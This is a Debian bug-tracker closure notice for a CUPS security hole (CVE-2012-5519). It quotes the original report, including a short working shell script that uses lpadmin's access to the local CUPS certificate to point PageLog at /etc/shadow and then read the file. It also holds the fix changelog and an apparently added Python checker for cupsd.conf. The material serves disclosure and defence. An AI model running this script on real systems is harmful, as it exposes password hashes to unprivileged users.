Your message dated Tue, 04 Dec 2012 12:17:52 +0000
with message-id <e1tfrrg-00005h...@franck.debian.org>
and subject line Bug#692791: fixed in cups 1.5.3-2.7
has caused the Debian Bug report #692791,
regarding members of lpadmin can read every file on server via cups
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
692791: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: cups
Version: 1.4.4-7+squeeze1
Severity: critical
Tags: security
Justification: root security hole

Members of lpadmin can read /var/run/cups/certs/0. With this key it is possible 
to access the cups web interface as admin. You can edit the cups config file 
and set the page log to any filename you want (for example /etc/shadow). Then 
you can read the file contents by viewing the cups page log. By printing you 
can also write some random data to the given file.

As it is not possible to use the cups authentication with a normal web browser, I 
created a simple shell script to show the effect. When called as any 
unprivileged user who is a member of lpadmin, it should display the contents of 
/etc/shadow:


#!/bin/sh
# POST and GET are the lwp-request command aliases shipped with libwww-perl.
set -e

# backup cupsd.conf
cp /etc/cups/cupsd.conf /tmp

# the local certificate file is readable by members of lpadmin
AUTH="Authorization: Local $(cat /var/run/cups/certs/0)"

# rewrite cupsd.conf through the web interface, pointing PageLog at /etc/shadow
POST -d -H "$AUTH" -H "Cookie: org.cups.sid=" http://localhost:631/admin/ <<EOF
OP=config-server&org.cups.sid=&SAVECHANGES=1&CUPSDCONF=Listen localhost:631%0APageLog /etc/shadow
EOF

# the "page log" served by the web interface is now /etc/shadow
GET http://localhost:631/admin/log/page_log


This bug was detected by one of our customers, Jann Horn.

-- System Information:
Debian Release: 6.0.6
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

-- Configuration Files:
/etc/cups/cupsd.conf changed [not included]

-- debconf information excluded

--- End Message ---
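An added defensive check, not from the bug report or the cups package: it scans a cupsd.conf for file-path directives that the post-fix configuration split keeps in cups-files.conf (out of reach of the web interface) and flags any log file pointing outside the expected log directory, as the PageLog line in the report does. The directive list and the /var/log/cups location are assumptions for this example, and the sample config is constructed.

```python
# Directives that the upstream STR #4223 split (backported in cups 1.5.3-2.7)
# keeps in cups-files.conf, which the web interface cannot edit. This is an
# assumed subset chosen for this check, not the complete upstream list.
FILE_DIRECTIVES = {"AccessLog", "ErrorLog", "PageLog", "ServerRoot", "DataDir",
                   "DocumentRoot", "RequestRoot", "StateDir", "TempDir"}
LOG_DIRECTIVES = {"AccessLog", "ErrorLog", "PageLog"}
CANONICAL = {d.lower(): d for d in FILE_DIRECTIVES}  # cupsd keywords are case-insensitive
LOG_DIR = "/var/log/cups"  # assumed log directory for this host
WRONG_FILE = "file directive in cupsd.conf; belongs in cups-files.conf"
BAD_PATH = "log path outside " + LOG_DIR

# Constructed sample of a cupsd.conf after the PageLog line was rewritten.
SAMPLE_CUPSD_CONF = """\
LogLevel warn
Listen localhost:631
# log settings
PageLog /etc/shadow
AccessLog syslog
ErrorLog /var/log/cups/error_log
<Location /admin>
  Require user @SYSTEM
</Location>
"""


def audit_cupsd_conf(text):
    """Return (directive, value, reason) for every suspicious line in cupsd.conf."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line or line.startswith("<"):  # skip <Location>/<Policy> tags
            continue
        parts = line.split(None, 1)
        directive = CANONICAL.get(parts[0].lower())
        if directive is None:
            continue  # not a file directive, nothing to check
        value = parts[1].strip() if len(parts) > 1 else ""
        reason = WRONG_FILE
        if (directive in LOG_DIRECTIVES and value.startswith("/")
                and not value.startswith(LOG_DIR + "/")):
            reason = BAD_PATH  # e.g. PageLog /etc/shadow
        findings.append((directive, value, reason))
    return findings


if __name__ == "__main__":
    for directive, value, reason in audit_cupsd_conf(SAMPLE_CUPSD_CONF):
        print("%-10s %-28s %s" % (directive, value, reason))
```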
--- Begin Message ---
Source: cups
Source-Version: 1.5.3-2.7

We believe that the bug you reported is fixed in the latest version of
cups, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 692...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Didier Raboud <o...@debian.org> (supplier of updated cups package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


Format: 1.8
Date: Tue, 04 Dec 2012 12:13:14 +0100
Source: cups
Binary: libcups2 libcupsimage2 libcupscgi1 libcupsdriver1 libcupsmime1 libcupsppdc1 cups cups-client libcups2-dev libcupsimage2-dev libcupscgi1-dev libcupsdriver1-dev libcupsmime1-dev libcupsppdc1-dev cups-bsd cups-common cups-ppdc cups-dbg cupsddk
Architecture: source all amd64
Version: 1.5.3-2.7
Distribution: unstable
Urgency: low
Maintainer: Debian Printing Team <debian-print...@lists.debian.org>
Changed-By: Didier Raboud <o...@debian.org>
Description: 
 cups       - Common UNIX Printing System(tm) - server
 cups-bsd   - Common UNIX Printing System(tm) - BSD commands
 cups-client - Common UNIX Printing System(tm) - client programs (SysV)
 cups-common - Common UNIX Printing System(tm) - common files
 cups-dbg   - Common UNIX Printing System(tm) - debugging symbols
 cups-ppdc  - Common UNIX Printing System(tm) - PPD manipulation utilities
 cupsddk    - Common UNIX Printing System (transitional package)
 libcups2   - Common UNIX Printing System(tm) - Core library
 libcups2-dev - Common UNIX Printing System(tm) - Development files CUPS library
 libcupscgi1 - Common UNIX Printing System(tm) - CGI library
 libcupscgi1-dev - Common UNIX Printing System(tm) - Development files for CGI libra
 libcupsdriver1 - Common UNIX Printing System(tm) - Driver library
 libcupsdriver1-dev - Common UNIX Printing System(tm) - Development files driver librar
 libcupsimage2 - Common UNIX Printing System(tm) - Raster image library
 libcupsimage2-dev - Common UNIX Printing System(tm) - Development files CUPS image li
 libcupsmime1 - Common UNIX Printing System(tm) - MIME library
 libcupsmime1-dev - Common UNIX Printing System(tm) - Development files MIME library
 libcupsppdc1 - Common UNIX Printing System(tm) - PPD manipulation library
 libcupsppdc1-dev - Common UNIX Printing System(tm) - Development files PPD library
Closes: 692791
Changes: 
 cups (1.5.3-2.7) unstable; urgency=low
 .
   * Backport upstream configuration files split to address CVE-2012-5519.
     - Add split-configuration-files-STR4223.patch
     - Refresh affected patches:
      - cups-deviced-allow-device-ids-with-newline.patch
      - default_log_settings.patch
      - pidfile.patch
      - reactivate_recommended_driver.patch
      - removecvstag.patch
      - tests-ignore-usb-crash.patch
     - Install the new cups-files.conf
     Fixes: CVE-2012-5519 (Closes: #692791)
   * Make cupsd.conf a non-conffile, as it is managed by cups itself.
     - On new installs, set it up from cupsd.conf.default.
     - On upgrades, move it away in preinst and move it back in postinst.
     - On aborted upgrades, move the file back in place.
   * Document the split in cups.NEWS.
   * Update translations for new manpage, install it.
   * Put under Debian Printing Team umbrella.

--- End Message ---